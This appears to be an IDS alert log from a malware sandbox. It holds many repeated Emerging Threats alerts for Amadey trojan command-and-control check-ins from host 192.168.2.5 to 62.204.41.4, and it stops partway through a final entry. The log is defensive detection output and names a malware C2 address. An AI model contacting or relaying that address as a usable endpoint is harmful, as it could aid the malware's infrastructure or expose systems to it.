ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450400802027700 02/07/23-20:00:16.471395
SID:	2027700
Source Port:	50400
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449744802027700 02/07/23-19:57:16.664080
SID:	2027700
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449940802027700 02/07/23-19:58:10.825829
SID:	2027700
Source Port:	49940
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449998802027700 02/07/23-19:58:27.044687
SID:	2027700
Source Port:	49998
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449822802027700 02/07/23-19:57:36.840230
SID:	2027700
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450150802027700 02/07/23-19:59:09.040992
SID:	2027700
Source Port:	50150
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450363802027700 02/07/23-20:00:07.542076
SID:	2027700
Source Port:	50363
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450080802027700 02/07/23-19:58:49.338343
SID:	2027700
Source Port:	50080
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450405802027700 02/07/23-20:00:17.657437
SID:	2027700
Source Port:	50405
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450441802027700 02/07/23-20:00:28.375723
SID:	2027700
Source Port:	50441
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449870802027700 02/07/23-19:57:52.051772
SID:	2027700
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450044802027700 02/07/23-19:58:38.182720
SID:	2027700
Source Port:	50044
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449917802027700 02/07/23-19:58:03.280189
SID:	2027700
Source Port:	49917
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450245802027700 02/07/23-19:59:34.591841
SID:	2027700
Source Port:	50245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449875802027700 02/07/23-19:57:53.010907
SID:	2027700
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450298802027700 02/07/23-19:59:49.514228
SID:	2027700
Source Port:	50298
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449757802027700 02/07/23-19:57:19.196421
SID:	2027700
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450024802027700 02/07/23-19:58:33.541536
SID:	2027700
Source Port:	50024
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450315802027700 02/07/23-19:59:53.640304
SID:	2027700
Source Port:	50315
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450085802027700 02/07/23-19:58:50.542002
SID:	2027700
Source Port:	50085
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450413802027700 02/07/23-20:00:19.937795
SID:	2027700
Source Port:	50413
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449867802027700 02/07/23-19:57:51.323673
SID:	2027700
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450195802027700 02/07/23-19:59:19.673213
SID:	2027700
Source Port:	50195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449711802027700 02/07/23-19:57:09.336516
SID:	2027700
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449895802027700 02/07/23-19:57:57.922450
SID:	2027700
Source Port:	49895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449965802027700 02/07/23-19:58:16.796475
SID:	2027700
Source Port:	49965
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450293802027700 02/07/23-19:59:48.325220
SID:	2027700
Source Port:	50293
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450122802027700 02/07/23-19:58:59.516632
SID:	2027700
Source Port:	50122
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450278802027700 02/07/23-19:59:44.686906
SID:	2027700
Source Port:	50278
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450376802027700 02/07/23-20:00:10.676242
SID:	2027700
Source Port:	50376
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450232802027700 02/07/23-19:59:31.467525
SID:	2027700
Source Port:	50232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449729802027700 02/07/23-19:57:13.008119
SID:	2027700
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449981802027700 02/07/23-19:58:20.676823
SID:	2027700
Source Port:	49981
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450330802027700 02/07/23-19:59:57.254968
SID:	2027700
Source Port:	50330
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450229802027700 02/07/23-19:59:30.761202
SID:	2027700
Source Port:	50229
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450057802027700 02/07/23-19:58:41.341646
SID:	2027700
Source Port:	50057
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449904802027700 02/07/23-19:58:00.083813
SID:	2027700
Source Port:	49904
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449732802027700 02/07/23-19:57:13.710639
SID:	2027700
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449830802027700 02/07/23-19:57:38.830731
SID:	2027700
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449986802027700 02/07/23-19:58:21.857184
SID:	2027700
Source Port:	49986
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450265802027700 02/07/23-19:59:39.451988
SID:	2027700
Source Port:	50265
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449937802027700 02/07/23-19:58:10.104815
SID:	2027700
Source Port:	49937
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449862802027700 02/07/23-19:57:50.104682
SID:	2027700
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450302802027700 02/07/23-19:59:50.470972
SID:	2027700
Source Port:	50302
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450060802027700 02/07/23-19:58:42.295231
SID:	2027700
Source Port:	50060
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450190802027700 02/07/23-19:59:18.716317
SID:	2027700
Source Port:	50190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449978802027700 02/07/23-19:58:19.951026
SID:	2027700
Source Port:	49978
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449724802027700 02/07/23-19:57:11.745483
SID:	2027700
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450011802027700 02/07/23-19:58:30.290364
SID:	2027700
Source Port:	50011
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450224802027700 02/07/23-19:59:29.577696
SID:	2027700
Source Port:	50224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450052802027700 02/07/23-19:58:40.105001
SID:	2027700
Source Port:	50052
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450348802027700 02/07/23-20:00:03.954544
SID:	2027700
Source Port:	50348
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450159802027700 02/07/23-19:59:11.230109
SID:	2027700
Source Port:	50159
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450384802027700 02/07/23-20:00:12.627471
SID:	2027700
Source Port:	50384
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449765802027700 02/07/23-19:57:20.854177
SID:	2027700
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450029802027700 02/07/23-19:58:34.809953
SID:	2027700
Source Port:	50029
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450130802027700 02/07/23-19:59:01.720565
SID:	2027700
Source Port:	50130
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450343802027700 02/07/23-20:00:00.779938
SID:	2027700
Source Port:	50343
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450421802027700 02/07/23-20:00:23.597298
SID:	2027700
Source Port:	50421
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450260802027700 02/07/23-19:59:38.219727
SID:	2027700
Source Port:	50260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449932802027700 02/07/23-19:58:09.150327
SID:	2027700
Source Port:	49932
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449890802027700 02/07/23-19:57:56.718243
SID:	2027700
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449802802027700 02/07/23-19:57:32.212401
SID:	2027700
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449760802027700 02/07/23-19:57:19.749026
SID:	2027700
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449973802027700 02/07/23-19:58:18.734052
SID:	2027700
Source Port:	49973
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449728802027700 02/07/23-19:57:12.773087
SID:	2027700
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449985802027700 02/07/23-19:58:21.623964
SID:	2027700
Source Port:	49985
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449731802027700 02/07/23-19:57:13.477085
SID:	2027700
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449798802027700 02/07/23-19:57:31.270025
SID:	2027700
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449887802027700 02/07/23-19:57:55.996115
SID:	2027700
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450249802027700 02/07/23-19:59:35.548839
SID:	2027700
Source Port:	50249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450347802027700 02/07/23-20:00:03.721907
SID:	2027700
Source Port:	50347
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450445802027700 02/07/23-20:00:29.348634
SID:	2027700
Source Port:	50445
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449896802027700 02/07/23-19:57:58.170170
SID:	2027700
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450350802027700 02/07/23-20:00:04.422898
SID:	2027700
Source Port:	50350
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449737802027700 02/07/23-19:57:14.935623
SID:	2027700
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450252802027700 02/07/23-19:59:36.278597
SID:	2027700
Source Port:	50252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449826802027700 02/07/23-19:57:37.847264
SID:	2027700
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450163802027700 02/07/23-19:59:12.188385
SID:	2027700
Source Port:	50163
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450191802027700 02/07/23-19:59:18.961060
SID:	2027700
Source Port:	50191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450261802027700 02/07/23-19:59:38.469324
SID:	2027700
Source Port:	50261
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450093802027700 02/07/23-19:58:52.513268
SID:	2027700
Source Port:	50093
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450280802027700 02/07/23-19:59:45.156579
SID:	2027700
Source Port:	50280
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449859802027700 02/07/23-19:57:49.355361
SID:	2027700
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450356802027700 02/07/23-20:00:05.846184
SID:	2027700
Source Port:	50356
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450004802027700 02/07/23-19:58:28.516743
SID:	2027700
Source Port:	50004
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450102802027700 02/07/23-19:58:54.714299
SID:	2027700
Source Port:	50102
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450258802027700 02/07/23-19:59:37.739913
SID:	2027700
Source Port:	50258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450089802027700 02/07/23-19:58:51.531272
SID:	2027700
Source Port:	50089
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449960802027700 02/07/23-19:58:15.604284
SID:	2027700
Source Port:	49960
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449868802027700 02/07/23-19:57:51.563260
SID:	2027700
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450328802027700 02/07/23-19:59:56.770342
SID:	2027700
Source Port:	50328
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449709802027700 02/07/23-19:57:08.852068
SID:	2027700
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449703802027700 02/07/23-19:57:06.000700
SID:	2027700
Source Port:	49703
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449810802027700 02/07/23-19:57:34.139598
SID:	2027700
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449957802027700 02/07/23-19:58:14.905022
SID:	2027700
Source Port:	49957
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450417802027700 02/07/23-20:00:22.516624
SID:	2027700
Source Port:	50417
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450092802027700 02/07/23-19:58:52.278298
SID:	2027700
Source Port:	50092
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450179802027700 02/07/23-19:59:16.043396
SID:	2027700
Source Port:	50179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449827802027700 02/07/23-19:57:38.087800
SID:	2027700
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450322802027700 02/07/23-19:59:55.303213
SID:	2027700
Source Port:	50322
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450233802027700 02/07/23-19:59:31.718708
SID:	2027700
Source Port:	50233
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450418802027700 02/07/23-20:00:22.859106
SID:	2027700
Source Port:	50418
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450446802027700 02/07/23-20:00:29.582178
SID:	2027700
Source Port:	50446
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.449929802027700 02/07/23-19:58:08.454291
SID:	2027700
Source Port:	49929
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.562.204.41.450286802027700 02/07/23-19:59:46.657209
